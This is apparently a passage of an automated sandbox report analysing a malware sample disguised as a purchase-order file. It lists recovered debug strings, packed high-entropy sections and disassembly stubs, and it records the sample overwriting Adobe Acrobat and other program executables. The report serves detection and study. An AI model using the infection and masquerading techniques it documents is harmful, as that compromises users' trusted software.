Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2099214565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbdo source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ?'oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @'o.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: o0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbW source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1646234871.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.1632221337.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsymbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegSvcs.pdb* source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: alg.exe.0.dr Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
Source: AppVClient.exe.0.dr Static PE information: real checksum: 0xcd10f should be: 0x151e0d
Source: armsvc.exe.0.dr Static PE information: section name: .didat
Source: alg.exe.0.dr Static PE information: section name: .didat
Source: OfficeC2RClient.exe.3.dr Static PE information: section name: .didat
Source: OfficeC2RClient.exe.3.dr Static PE information: section name: .detourc
Source: plugin-container.exe.3.dr Static PE information: section name: .00cfg
Source: plugin-container.exe.3.dr Static PE information: section name: .voltbl
Source: private_browsing.exe.3.dr Static PE information: section name: .00cfg
Source: private_browsing.exe.3.dr Static PE information: section name: .voltbl
Source: updater.exe.3.dr Static PE information: section name: .00cfg
Source: updater.exe.3.dr Static PE information: section name: .voltbl
Source: updater.exe.3.dr Static PE information: section name: _RDATA
Source: officesvcmgr.exe.3.dr Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.3.dr Static PE information: section name: .gxfg
Source: elevated_tracing_service.exe.3.dr Static PE information: section name: .retplne
Source: elevated_tracing_service.exe.3.dr Static PE information: section name: CPADinfo
Source: elevated_tracing_service.exe.3.dr Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.3.dr Static PE information: section name: malloc_h
Source: chrmstp.exe.3.dr Static PE information: section name: .gxfg
Source: chrmstp.exe.3.dr Static PE information: section name: .retplne
Source: chrmstp.exe.3.dr Static PE information: section name: .rodata
Source: chrmstp.exe.3.dr Static PE information: section name: CPADinfo
Source: chrmstp.exe.3.dr Static PE information: section name: LZMADEC
Source: chrmstp.exe.3.dr Static PE information: section name: _RDATA
Source: chrmstp.exe.3.dr Static PE information: section name: malloc_h
Source: updater.exe0.3.dr Static PE information: section name: CPADinfo
Source: updater.exe0.3.dr Static PE information: section name: malloc_h
Source: elevation_service.exe.3.dr Static PE information: section name: .00cfg
Source: elevation_service.exe.3.dr Static PE information: section name: .gxfg
Source: elevation_service.exe.3.dr Static PE information: section name: .retplne
Source: elevation_service.exe.3.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.3.dr Static PE information: section name: malloc_h
Source: maintenanceservice.exe.3.dr Static PE information: section name: .00cfg
Source: maintenanceservice.exe.3.dr Static PE information: section name: .voltbl
Source: maintenanceservice.exe.3.dr Static PE information: section name: _RDATA
Source: elevation_service.exe0.3.dr Static PE information: section name: .gxfg
Source: elevation_service.exe0.3.dr Static PE information: section name: .retplne
Source: elevation_service.exe0.3.dr Static PE information: section name: _RDATA
Source: Acrobat.exe.3.dr Static PE information: section name: .didat
Source: Acrobat.exe.3.dr Static PE information: section name: _RDATA
Source: unpack200.exe.3.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: _RDATA
Source: AcroCEF.exe.3.dr Static PE information: section name: .didat
Source: AcroCEF.exe.3.dr Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: section name: _RDATA
Source: cookie_exporter.exe.3.dr Static PE information: section name: .00cfg
Source: cookie_exporter.exe.3.dr Static PE information: section name: .gxfg
Source: cookie_exporter.exe.3.dr Static PE information: section name: .retplne
Source: cookie_exporter.exe.3.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr Static PE information: section name: .00cfg
Source: identity_helper.exe.3.dr Static PE information: section name: .gxfg
Source: identity_helper.exe.3.dr Static PE information: section name: .retplne
Source: identity_helper.exe.3.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr Static PE information: section name: malloc_h
Source: setup.exe.3.dr Static PE information: section name: .00cfg
Source: setup.exe.3.dr Static PE information: section name: .gxfg
Source: setup.exe.3.dr Static PE information: section name: .retplne
Source: setup.exe.3.dr Static PE information: section name: LZMADEC
Source: setup.exe.3.dr Static PE information: section name: _RDATA
Source: setup.exe.3.dr Static PE information: section name: malloc_h
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00428945 push ecx; ret 0_2_00428958
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00402F12 push es; retf 0_2_00402F13
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00BB61EA push esi; retf 0_2_00BB61FA
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00BB6619 push esi; retf 0_2_00BB661A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8520C push 02F8528Fh; ret 0_2_02F8522D
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8B180 push 02F8B0CAh; ret 0_2_02F8B061
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8B180 push 02F8B30Dh; ret 0_2_02F8B1E6
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8B180 push 02F8B2F2h; ret 0_2_02F8B262
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8B180 push 02F8B255h; ret 0_2_02F8B2ED
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8B180 push 02F8B2D0h; ret 0_2_02F8B346
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F8B180 push 02F8B37Fh; ret 0_2_02F8B3B7
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA852Eh; ret 0_2_02FA7F3A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8514h; ret 0_2_02FA7F66
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA7E66h; ret 0_2_02FA8057
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA817Ah; ret 0_2_02FA808B
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA82E5h; ret 0_2_02FA80D9
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA826Ah; ret 0_2_02FA819E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA849Ch; ret 0_2_02FA81E4
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8321h; ret 0_2_02FA82E0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA7FBFh; ret 0_2_02FA831F
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA7FA8h; ret 0_2_02FA834C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA84BAh; ret 0_2_02FA83E2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8426h; ret 0_2_02FA84D8
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8075h; ret 0_2_02FA84FD
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA808Ch; ret 0_2_02FA8512
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8D45h; ret 0_2_02FA87D3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8AB5h; ret 0_2_02FA8B13
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8784h; ret 0_2_02FA8CA1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8DC9h; ret 0_2_02FA8E1C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8D14h; ret 0_2_02FA8E2E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FA8550 push 02FA8674h; ret 0_2_02FA8E4D
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Static PE information: section name: .reloc entropy: 7.931587829692506
Source: exhilaratingly.exe.0.dr Static PE information: section name: .reloc entropy: 7.931587829692506
Source: AppVClient.exe.0.dr Static PE information: section name: .reloc entropy: 7.936514167669467
Source: OfficeC2RClient.exe.3.dr Static PE information: section name: .reloc entropy: 7.716516490263077
Source: Aut2exe.exe.3.dr Static PE information: section name: .rsrc entropy: 7.800656585538328
Source: Aut2exe_x64.exe.3.dr Static PE information: section name: .rsrc entropy: 7.800509028200441
Source: AutoIt3_x64.exe.3.dr Static PE information: section name: .reloc entropy: 7.943938710340782
Source: officesvcmgr.exe.3.dr Static PE information: section name: .reloc entropy: 7.9372275219955215
Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .reloc entropy: 7.941704479049093
Source: elevated_tracing_service.exe.3.dr Static PE information: section name: .reloc entropy: 7.937521429957238
Source: chrmstp.exe.3.dr Static PE information: section name: .reloc entropy: 7.935927058600113
Source: updater.exe0.3.dr Static PE information: section name: .reloc entropy: 7.878683588461651
Source: elevation_service.exe.3.dr Static PE information: section name: .reloc entropy: 7.94596991768073
Source: SciTE.exe.3.dr Static PE information: section name: .reloc entropy: 7.912342146177023
Source: jucheck.exe.3.dr Static PE information: section name: .reloc entropy: 7.931095081946931
Source: jusched.exe.3.dr Static PE information: section name: .reloc entropy: 7.9360655841269905
Source: elevation_service.exe0.3.dr Static PE information: section name: .reloc entropy: 7.9451535749911155
Source: 7zFM.exe.3.dr Static PE information: section name: .reloc entropy: 7.932155908951415
Source: 7zG.exe.3.dr Static PE information: section name: .reloc entropy: 7.92770181237919
Source: Acrobat.exe.3.dr Static PE information: section name: .reloc entropy: 7.940560199013122
Source: AcroCEF.exe.3.dr Static PE information: section name: .reloc entropy: 7.937574682899404
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: section name: .reloc entropy: 7.943720789696338
Source: identity_helper.exe.3.dr Static PE information: section name: .reloc entropy: 7.940744376156054
Source: setup.exe.3.dr Static PE information: section name: .reloc entropy: 7.944754096051668

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\d225894719a6adcd.bin
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
